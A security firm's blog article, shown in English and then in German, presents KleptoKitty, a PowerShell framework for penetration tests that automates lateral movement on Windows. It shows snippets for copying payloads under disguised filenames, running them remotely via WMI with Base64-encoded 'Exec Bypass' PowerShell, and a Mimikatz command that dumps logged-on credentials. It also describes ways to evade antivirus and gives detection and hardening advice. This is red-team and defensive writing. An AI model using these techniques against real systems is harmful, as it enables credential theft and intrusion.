KleptoKitty - Deploying Payloads and Collecting Credentials

KleptoKitty

Deploying Payloads and Collecting Credentials

Michael Schneider
by Michael Schneider
on September 17, 2020
time to read: 8 minutes

Keypoints

This is what our KleptoKitty can do for you

  • KleptoKitty is a lateral movement framework
  • The goal is the automated dumping of credentials
  • KleptoKitty controls the delivery and remote execution of a payload, and collects credentials
  • Various payloads are supported, including Mimikatz
  • Lateral movement attacks can be detected and mitigated through hardening measures such as client seperation, PowerShell logging, AMSI, ASR and log analysis

After attackers have compromised a system and got privileged access, the analysis of the system begins. They check which remote access services are used and which security controls are applied. Based on this information, attackers develop a customized payload and identify interesting targets in the network. Thanks to a detailed preparation, an attack on other targets takes only a few minutes and can be conducted automatically. For our services like Penetration Tests or Adversary Simulations we rely among others on the Lateral Movement Framework KleptoKitty.

KleptoKitty, the twin sister of HardeningKitty is a PowerShell based framework for lateral movement attacks (MITRE ATT&CK TA0008) in a Windows infrastructure. The development started in October 2019 after inspiration of the cypherpunk and hacker Tinker and the first version was a simple PowerShell script. The capabilities of the script were step-by-step expanded. KleptoKitty copies payloads to the target system, execute them there, then credentials are extracted, and the payload is removed afterwards. Another goal in developing the framework is to be able to easily adapt new attack techniques and integrate them as new payloads.

Payloads include Invoke-Mimikatz from Empire by BC Security, Mimikatz by Benjamin Delpy and PPLKiller by Red Cursor. Since we benefit from excellent work from the IT security community, we provide KleptoKitty on our GitHub repository under MIT license.

Standard Windows components are used for file transfer and remote command execution. Most functions are controlled by PowerShell (MITRE ATT&CK T1059-001). By default, files are copied to the target system via SMB/Admin shares (MITRE ATT&CK T1021-002). For remote execution of commands, Windows Management Instrumentation (WMI) (MITRE ATT&CK T1047), PsExec (MITRE ATT&CK T1569-002) or Windows Remote Management (WinRM) (MITRE ATT&CK T1021-006) can be used. The goal is to get local credentials (SAM) (MITRE ATT&CK T1003-002) and credentials of active accounts in Windows LSA memory (MITRE ATT&CK T1003-001).

“Hello World” with KleptoKitty

The payload Demo is a good example to explain the functionality of KleptoKitty. The payload is copied to the target and executed there. The payload leaves a log entry in the newly created file under C:\Windows\kleptokitty.log:

$ProtocolPath = "C:\Windows\kleptokitty.log"
$Time = Get-Date -Format G
$Message = "$Time - KleptoKitty was here."
Add-Content -Path $ProtocolPath -Value $Message

For the payload Demo, only a file needs to be copied and executed on target. It is not necessary to extract a log file. The name of the payload is generated randomly at runtime for each target system. It is intended to give a harmless impression by using names of Windows system files. In the first step, the payload is copied. If this fails, further execution will be stopped. The payload is then executed and afterwards deleted from the system:

# Copy Payload
Write-ProtocolEntry -Text "Copy payload $TargetPayloadName to $Hostname" -LogLevel "Info"
$ResultCopyPayload = Copy-Payload -Source $PayloadPathCredentialAccess -Destination $TargetPayloadPath
If (-not($ResultCopyPayload)) { Continue }

# Execute Payload
Write-ProtocolEntry -Text "Execute payload on $Hostname" -LogLevel "Info"
$PayloadCommandCredentialAccess = "$TargetPayloadLocalPath"
$ResultExecutePayload = Execute-Payload -PayloadCommand $PayloadCommandCredentialAccess
If ($ResultExecutePayload) {
    Write-ProtocolEntry -Text "Payload $PayloadCredentialAccess executed." -LogLevel "Success"
}

# House Cleaning
Write-ProtocolEntry -Text "Delete payload on $Hostname" -LogLevel "Info"
Delete-File -File $TargetPayloadPath

The remote command execution is done using WMI. A new process is created and powershell.exe is started. Optionally, the arguments of the payload can be encoded with Base64 and thus disguised. However, if PowerShell Script Block Logging is enabled, the execution call is stored decoded in the event log. Additionally, the use of Base64 encoding might be an indicator for a malicious action. The use of this obfuscation is optional and can be controlled when the function is called.

Code $PayloadCommandEncoded = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($PayloadCommand))
$ArgumentList = "powershell.exe -Exec Bypass -Enc $PayloadCommandEncoded"

try {
    $WmiExec = Invoke-WmiMethod -Class "win32_process" -Name "create" -ArgumentList $ArgumentList -ComputerName $Hostname -Credential $AdminCredential -ErrorAction Stop
} catch {
    $ErrorReason = $_.Exception.Message
    Write-ProtocolEntry -Text "WMI connection to $Hostname failed. Reason: $ErrorReason" -LogLevel "Error"
    Write-ProtocolEntry -Text "$Hostname done" -LogLevel "Error"
    $ReturnCode = $false 
}

Once the payload has been started on the target system, the process can only be monitored indirectly. Therefore, if a log file is written and should be copied back, it is worth waiting a while before taking further steps.

Structure of a payload

The following example is based on a payload with Invoke-Mimikatz. The Invoke-Mimikatz function itself is copied to the payload. This is followed by the definition of a log file for the Mimikatz log file. The name of the log file must be known to KleptoKitty, otherwise the log file cannot be extracted. Then the Mimikatz statements to be executed are defined. In the following example the credentials of active users on the system are dumped from memory:

Function FormerlyKnownAsMimikatz {
    # <add the script here>
}

# Log
$TargetBasePath = "Windows"
$TargetLogName = "de-ch.log"
$TargetLogLocalPath = "C:\$TargetBasePath\$TargetLogName"

# Run Payload
FormerlyKnownAsMimikatz -Command """log $TargetLogLocalPath"" privilege::debug sekurlsa::logonpasswords"

The payload itself can also be encoded with Base64 or encrypted with Rijndael. For the encryption, a script based on an example implementation by Kae Travis is used. The encoding or encryption disguises the payload, so that it can escape detection by a virus scanner. However, the decoding/decryption process is done at runtime. Virus scanners with support for Microsoft AMSI can therefore scan the unprotected version of the payload.

Detection and mitigation

Various controls can be used to detect and prevent lateral movement attacks. A very efficient measure is to prevent client-to-client communication by using the Windows Firewall or another host firewall. In particular, services such as WMI, SMB and WinRM should not be accessible at all or only for specifically defined systems. Chad Duffey has written a blog article on this subject to restrict SMB lateral movement attacks.

We presented measures for monitoring activities with PowerShell in the article PowerShell Monitoring. By enabling PowerShell Script Block Logging, Base64-encoded payloads can be decoded and analysed. The article also contains a list of keywords that can be used to filter and investigate PowerShell logs. It is also recommended that you use an anti-virus solution that supports the Microsoft Antimalware Scan Interfaces (AMSI), since this enables to scan file less attacks with a virus scanner.

With the implementation of the Attack Surface Reduction (ASR) rule set, processes that are spawned with PsExec or WMI can be blocked or at least audited. The article Monitoring Mimikatz explains how Mimikatz can be detected by analysing event logs and using Sysmon. In addition, hardening measures for Windows Local Security Authority (LSA) should be implemented.

What’s next?

The development of KleptoKitty will continue, not all desired features have been implemented yet. Among other things, it is planned to offer payload distribution via HTTP or SMB shares. In addition, we also try to implement new attack techniques as soon as possible. We are looking forward to feedback, suggestions for improvement, war stories how KleptoKitty was successfully used and also pull requests are welcome.

About the Author

Michael Schneider

Michael Schneider has been in IT since 2000. Since 2010 he is focused on information security. He is an expert at penetration testing, hardening and the detection of vulnerabilities in operating systems. He is well-known for a variety of tools written in PowerShell to find, exploit, and mitigate weaknesses. (ORCID 0000-0003-0772-9761)

Links

You want to test the security of your firewall?

Our experts will get in contact with you!

×
WebSockets

WebSockets

Michael Schneider

HardeningKitty Score

HardeningKitty Score

Michael Schneider

HTTP Response Header

HTTP Response Header

Michael Schneider

You want more?

Further articles available here

You need support in such a project?

Our experts will get in contact with you!

You want more?

Further articles available here

KleptoKitty - Payloads verteilen und Zugangsdaten sammeln

KleptoKitty

Payloads verteilen und Zugangsdaten sammeln

Michael Schneider
von Michael Schneider
am 17. September 2020
Lesezeit: 8 Minuten

Keypoints

Das kann unser KleptoKitty

  • KleptoKitty ist ein Lateral Movement Framework
  • Ziel ist das automatisierte Auslesen von Zugangsdaten
  • KleptoKitty steuert das Ausliefern und Ausführen einer Payload, sammelt Zugangsdaten
  • Es werden verschiedene Payloads unterstützt, unter anderem Mimikatz
  • Lateral-Movement-Angriffe können durch Hardeningmassnahmen wie Client Separation, PowerShell Logging, AMSI, ASR und Auswertung von Logs erkannt und verhindert werden

Nachdem Angreifer ein System übernommen haben und über privilegierte Zugangsdaten verfügen, beginnt die Analyse des Systems. Es wird untersucht welche Fernzugriffsdienste genutzt und welche Sicherheitskontrollen eingesetzt werden. Anhand dieser Informationen wird eine passende Payload entwickelt und interessante Ziele im Netzwerk ausgesucht. Dank der guten Vorbereitung dauert danach ein Angriff auf weitere Zielsysteme nur wenige Minuten und kann automatisiert durchgeführt werden. Für unsere Dienstleistungen wie Penetration Tests oder Adversary Simulationen setzen wir unter anderem auf das Lateral Movement Framework KleptoKitty.

KleptoKitty, die Zwillingsschwester von HardeningKitty, ist ein auf PowerShell basierendes Framework für Lateral-Movement-Angriffe (MITRE ATT&CK TA0008) in einer Windows-Infrastruktur. Die Entwicklung begann im Oktober 2019 nach Inspiration des Cypherpunks und Hackers Tinker und die erste Version war ein einfaches PowerShell-Skript. Die Funktionalität des Skripts wurde nach und nach ausgebaut. Mit KleptoKitty werden Payloads auf das Zielsystem kopiert, dort ausgeführt, danach Zugangsdaten extrahiert und die Payload wieder entfernt. Ein zusätzliches Ziel bei der Entwicklung des Frameworks war es neue Angriffstechniken einfach adaptieren und als zusätzliche Payload einbinden zu können.

Als Payloads werden unter anderem Invoke-Mimikatz aus Empire von BC Security, Mimikatz von Benjamin Delpy und PPLKiller von Red Cursor eingesetzt. Da wir von hervorragenden Arbeiten aus der IT-Security-Community profitieren, stellen wir KleptoKitty auf unserem GitHub Repository unter MIT-Lizenz frei zur Verfügung.

Für die Übertragung von Dateien sowie Remote-Ausführung von Befehlen werden Windows-Standardkomponenten verwendet. Die meisten Funktionen werden mittels PowerShell (MITRE ATT&CK T1059-001) gesteuert. Dabei werden Dateien standardmässig über SMB-/Admin-Freigaben (MITRE ATT&CK T1021-002) auf das Zielsystem kopiert. Für die Remote-Ausführung von Befehlen kann Windows Management Instrumentation (WMI) (MITRE ATT&CK T1047), PsExec (MITRE ATT&CK T1569-002) oder Windows Remote Management (WinRM) (MITRE ATT&CK T1021-006) genutzt werden. Das Ziel ist es an lokale Zugangsdaten (SAM) (MITRE ATT&CK T1003-002) und Zugangsdaten von aktiven Accounts im Windows LSA Speicher (MITRE ATT&CK T1003-001) zu gelangen.

“Hello World” mit KleptoKitty

Die Payload Demo eignet sich gut um die Funktionsweise von KleptoKitty zu erklären. Die Payload wird auf das Zielsystem kopiert und dort ausgeführt. Die Payload erstellt dabei eine Datei unter C:\Windows\kleptokitty.log und hinterlässt einen Protokolleintrag:

$ProtocolPath = "C:\Windows\kleptokitty.log"
$Time = Get-Date -Format G
$Message = "$Time - KleptoKitty was here."
Add-Content -Path $ProtocolPath -Value $Message

Für die Payload Demo muss nur ein Kopiervorgang durchgeführt und ein Befehl ausgeführt werden. Es ist nicht nötig eine Logdatei vom Zielsystem zu extrahieren. Der Name der Payload wird für jedes Zielsystem zur Laufzeit zufällig festgelegt und soll einen harmlosen Eindruck vermitteln, indem Namen von Windows-Systemdateien verwendet werden. Im ersten Schritt wird die Payload kopiert, falls dies misslingt wird die weitere Ausführung abgebrochen. Danach wird die Payload gestartet und anschliessend auf dem System gelöscht:

# Copy Payload
Write-ProtocolEntry -Text "Copy payload $TargetPayloadName to $Hostname" -LogLevel "Info"
$ResultCopyPayload = Copy-Payload -Source $PayloadPathCredentialAccess -Destination $TargetPayloadPath
If (-not($ResultCopyPayload)) { Continue }

# Execute Payload
Write-ProtocolEntry -Text "Execute payload on $Hostname" -LogLevel "Info"
$PayloadCommandCredentialAccess = "$TargetPayloadLocalPath"
$ResultExecutePayload = Execute-Payload -PayloadCommand $PayloadCommandCredentialAccess
If ($ResultExecutePayload) {
    Write-ProtocolEntry -Text "Payload $PayloadCredentialAccess executed." -LogLevel "Success"
}

# House Cleaning
Write-ProtocolEntry -Text "Delete payload on $Hostname" -LogLevel "Info"
Delete-File -File $TargetPayloadPath      

Die Remote-Befehl-Ausführung geschieht über WMI. Dabei wird ein neuer Prozess kreiert und powershell.exe gestartet. Wahlweise kann der Aufruf der Payload mit Base64-kodiert und somit verschleiert werden. Falls PowerShell Script Block Logging aktiviert ist, wird der Aufruf des Skripts jedoch dekodiert im Event Log gespeichert. Zudem kann die Verwendung der Base64-Kodierung ein Indikator für eine bösartige Aktion darstellen. Die Verwendung dieser Verschleierungsmassnahme ist optional und kann beim Aufruf der Funktion gesteuert werden.

Code $PayloadCommandEncoded = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($PayloadCommand))
$ArgumentList = "powershell.exe -Exec Bypass -Enc $PayloadCommandEncoded"

try {
    $WmiExec = Invoke-WmiMethod -Class "win32_process" -Name "create" -ArgumentList $ArgumentList -ComputerName $Hostname -Credential $AdminCredential -ErrorAction Stop
} catch {
    $ErrorReason = $_.Exception.Message
    Write-ProtocolEntry -Text "WMI connection to $Hostname failed. Reason: $ErrorReason" -LogLevel "Error"
    Write-ProtocolEntry -Text "$Hostname done" -LogLevel "Error"
    $ReturnCode = $false 
}

Nachdem die Payload auf dem Zielsystem gestartet wurde, kann die Ausführung dieser nur indirekt überwacht werden. Wenn eine Logdatei geschrieben und zurückkopiert werden sollte, lohnt es sich eine Weile zu warten, bevor weitere Schritte, wie das Kopieren dieser Logdatei, durchgeführt werden.

Aufbau einer Payload

Das folgende Beispiel basiert auf einer Payload mit Invoke-Mimikatz. Dabei wird die Funktion Invoke-Mimikatz selbst in die Payload kopiert. Im Anschluss folgt die Definition einer Logdatei für Mimikatz. Der Name der Logdatei muss KleptoKitty bekannt sein, sonst kann die Logdatei nicht extrahiert werden. Danach werden die auszuführenden Mimikatz-Anweisungen definiert. Im folgenden Beispiel werden die Zugangsdaten von aktiven Benutzern auf dem System ausgelesen:

Function FormerlyKnownAsMimikatz {
    # <add the script here>
}

# Log
$TargetBasePath = "Windows"
$TargetLogName = "de-ch.log"
$TargetLogLocalPath = "C:\$TargetBasePath\$TargetLogName"

# Run Payload
FormerlyKnownAsMimikatz -Command """log $TargetLogLocalPath"" privilege::debug sekurlsa::logonpasswords"

Die Payload kann mit Base64 kodiert oder mittels Rijndael verschlüsselt werden. Für die Verschlüsselung wird ein Skript auf der Basis von einer Beispielimplementation von Kae Travis eingesetzt. Durch die Kodierung oder Verschlüsselung wird die Payload verschleiert und kann so allenfalls die Erkennung durch einen Virenscanner entgehen. Die Dekodierung/Entschlüsselung erfolgt zur Laufzeit. Virenscanner mit Unterstützung für Microsoft AMSI können daher die ungeschützte Version der Payload untersuchen.

Detektierung und Mitigation

Um Lateral-Movement-Angriffe zu erkennen und zu verhindern, können verschiedene Kontrollen eingesetzt werden. Ein sehr effizientes Mittels ist das Verhindern von Client-zu-Client-Kommunikation durch den Einsatz der Windows-Firewall oder einer anderen Host-Firewall. Dabei sollten vor allem Dienste wie WMI, SMB sowie WinRM gar nicht oder nur für spezifisch definierte Systeme erreichbar sein. Chad Duffey hatte dazu einen Blog-Artikel zur Einschränkung von SMB-Lateral-Movement-Angriffen geschrieben.

Im Labs Artikel PowerShell Monitoring haben wir Massnahmen zur Überwachung von Aktivitäten mit PowerShell vorgestellt. Durch die Aktivierung von PowerShell Script Block Logging können Base64-kodierte Payloads aufgeschlüsselt werden. Der Artikel enthält ebenso eine Liste mit Schlüsselwörter, nach welchen die PowerShell-Logs untersucht werden können. Zudem ist der Einsatz einer Antiviren-Lösung mit Unterstützung des Microsoft Antimalware Scan Interfaces (AMSI) empfehlenswert, da damit sogenannte file less attacks auch mit einem Virenscanner untersucht werden können.

Mit der Implementation des Regelwerks Attack Surface Reduction (ASR) können Prozesse, die mit PsExec oder WMI gestartet werden, blockiert oder zumindest aufgezeichnet werden. Der Artikel Monitoring Mimikatz zeigt auf wie Mimikatz mit der Auswertung von Event Logs und dem Einsatz von Sysmon detektiert werden kann. Zudem sollten Hardenigmassnahmen für die Windows Local Security Authority (LSA) implementiert werden.

Ausblick

Die Entwicklung von KleptoKitty wird weiter geführt, noch sind nicht alle gewünschten Features implementiert. Es ist unter anderem geplant die Verteilung von Payloads über HTTP oder SMB-Shares anzubieten. Zudem versuchen wir auch neue Entwicklungen und Angriffstechniken möglichst zeitnah zu implementieren. Wir freuen uns über Feedback, Verbesserungsvorschläge, “Lagerfeuer-Geschichten” wie KleptoKitty erfolgreich eingesetzt wurde und auch Pull-Requests sind willkommen.

Über den Autor

Michael Schneider

Michael Schneider arbeitet seit dem Jahr 2000 in der IT. Im Jahr 2010 hat er sich auf die Informationssicherheit spezialisiert. Zu seinen Aufgaben gehören das Penetration Testing, Hardening und das Aufspüren von Schwachstellen in Betriebssystemen. Er ist bekannt für eine Vielzahl in PowerShell geschrieber Tools zum Finden, Ausnutzen und Beheben von Schwachstellen. (ORCID 0000-0003-0772-9761)

Links

Sie wollen die Sicherheit Ihrer Firewall prüfen?

Unsere Spezialisten kontaktieren Sie gern!

×
HardeningKitty

HardeningKitty

Michael Schneider

Linux Hardening

Linux Hardening

Michael Schneider

Attack Surface Reduction Regeln

Attack Surface Reduction Regeln

Michael Schneider

Sie wollen mehr?

Weitere Artikel im Archiv

Sie brauchen Unterstützung bei einem solchen Projekt?

Unsere Spezialisten kontaktieren Sie gern!

Sie wollen mehr?

Weitere Artikel im Archiv